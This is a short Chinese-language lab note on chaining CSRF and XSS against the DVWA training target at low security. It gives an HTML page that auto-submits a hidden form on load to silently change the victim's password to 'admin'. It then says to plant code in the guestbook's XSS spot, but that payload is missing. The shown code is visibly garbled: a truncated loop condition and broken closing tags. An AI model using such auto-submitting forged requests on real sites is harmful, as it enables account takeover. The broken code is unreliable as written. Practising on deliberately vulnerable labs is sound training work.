环境:dvwa靶场+low等级+CSRF+XSS
payload1
将如下代码 1.html 放置攻击者web服务器中(dvwa靶场搭建的网站根目录)
- <body onload="javascript:fireForms()">
- <script language="JavaScript">
- var pauses = new Array( "42" );
- function pausecomp(millis){
- var date = new Date();
- var curDate = null;
- do { curDate = new Date(); }
- while(curDate-date < millis);}
- function fireForms(){
- var count = 1;
- var i=0;
- for(i=0; i
- document.forms[i].submit();
- pausecomp(pauses[i]);}}
-
- script>
- <form action="http://127.0.0.1/dvwa/vulnerabilities/csrf/">
- <input type="hidden" name="password_new" value="admin" />
- <input type="hidden" name="password_conf" value="admin" />
- <input type="hidden" name="Change" value="Change" />
- <input type="submit" value="Submit request" />
- form>
- body>
- html>
注意:第18行的url是csrf页面,具体的IP、路径可能因人而异,注意修改
payload2
将如下代码插入到存在XSS的位置——sign guestbook
-